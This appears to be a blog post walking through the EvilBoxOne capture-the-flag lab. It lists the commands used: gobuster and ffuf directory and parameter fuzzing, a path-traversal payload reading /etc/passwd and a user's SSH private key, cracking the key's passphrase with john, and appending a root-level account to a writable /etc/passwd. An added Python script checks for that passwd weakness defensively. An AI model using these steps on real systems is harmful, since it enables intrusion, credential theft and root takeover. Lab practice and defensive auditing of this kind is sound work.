ailx10
Outstanding answerer in network security
Master's degree in network security
1. Host discovery (192.168.199.144)
2. Port scan (22, 80)
3. Directory discovery
    [19:51:35] 200 - 12B - /robots.txt
    [19:51:35] 301 - 319B - /secret -> http://192.168.199.144/secret/
4. Look for clues (a suspected username)
5. Visit it; the page is blank
6. Continue brute-forcing
    gobuster dir -u http://192.168.199.144/secret/ -w /usr/share/wordlists/dirb/big.txt -x .php
7. Visit it; still blank
8. Brute-force the parameter
    ffuf -u 'http://192.168.199.144/secret/evil.php?FUZZ=../../../../../etc/passwd' -w "/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt" -fs 0
9. Visit it and find the username mowree (file inclusion)
10. Use the file inclusion to look for the password
    http://192.168.199.144/secret/evil.php?command=/home/mowree/.ssh/id_rsa
11. Try to log in; a password is required (the key is protected by a passphrase)
    ssh -i id_rsa mowree@192.168.199.144
12. Brute-force with john; the password is unicorn
    ssh2john id_rsa > password
    john --show password
13. Log in again and get the regular (user) flag
14. /etc/passwd is writable (w = write permission)
15. Generate an MD5-based password hash for 123
    mowree@EvilBoxOne:~$ openssl passwd -help
    Usage: passwd [options]
    Valid options are:
     -help               Display this summary
     -in infile          Read passwords from file
     -noverify           Never verify when reading password from terminal
     -quiet              No warnings
     -table              Format output as table
     -reverse            Switch table columns
     -salt val           Use provided salt
     -stdin              Read passwords from stdin
     -6                  SHA512-based password algorithm
     -5                  SHA256-based password algorithm
     -apr1               MD5-based password algorithm, Apache variant
     -1                  MD5-based password algorithm
     -aixmd5             AIX MD5-based password algorithm
     -crypt              Standard Unix password algorithm (default)
     -rand val           Load the file(s) into the random number generator
     -writerand outfile  Write random data to the specified file
16. Write an entry for the user ailx00 into passwd (note the single quotes), and successfully get root's flag
    echo 'ailx00:$1$Tuse491W$mmxvOkGDQHibl4DzhH3Fe1:0:0:root:/root:/bin/bash' >> /etc/passwd
That completes the lab.
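A defender-side check for the condition used in steps 14 to 16, as an added example that is not part of the original post: it flags a passwd file that non-root users can write, UID 0 accounts other than root, and hashes stored directly in the passwd field. The sample entries and the function names are constructed for illustration.

```python
import os
import stat

# Constructed sample: passwd contents after an append like the one in step 16.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash
ailx00:$1$CONSTRUCTED$placeholderhash:0:0:root:/root:/bin/bash
"""

def audit_passwd_text(text):
    """Return (line_no, user, reason) findings for passwd-format text."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        if uid.isdigit() and int(uid) == 0 and user != "root":
            findings.append((n, user, "UID 0 account other than root"))
        if pw.startswith("$"):  # a crypt(3) hash here is used instead of /etc/shadow
            findings.append((n, user, "password hash in passwd field"))
        elif pw == "":
            findings.append((n, user, "empty password field"))
    return findings

def mode_is_unsafe(mode):
    """True if group or others can write; /etc/passwd is normally 0644."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_passwd_file(path="/etc/passwd"):
    """Check ownership and mode of the file, then audit its entries."""
    st = os.stat(path)
    findings = []
    if st.st_uid != 0:
        findings.append((0, path, "not owned by root (uid %d)" % st.st_uid))
    if mode_is_unsafe(st.st_mode):
        findings.append((0, path, "mode %04o allows non-owner writes" % stat.S_IMODE(st.st_mode)))
    with open(path, encoding="utf-8", errors="replace") as fh:
        return findings + audit_passwd_text(fh.read())

if __name__ == "__main__":
    for finding in audit_passwd_text(SAMPLE_PASSWD):
        print(finding)
```

Running `audit_passwd_file()` on a host checks the live file; the fix for a finding on the file itself is `root:root` ownership with mode 0644.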
Published 2022-08-26 23:45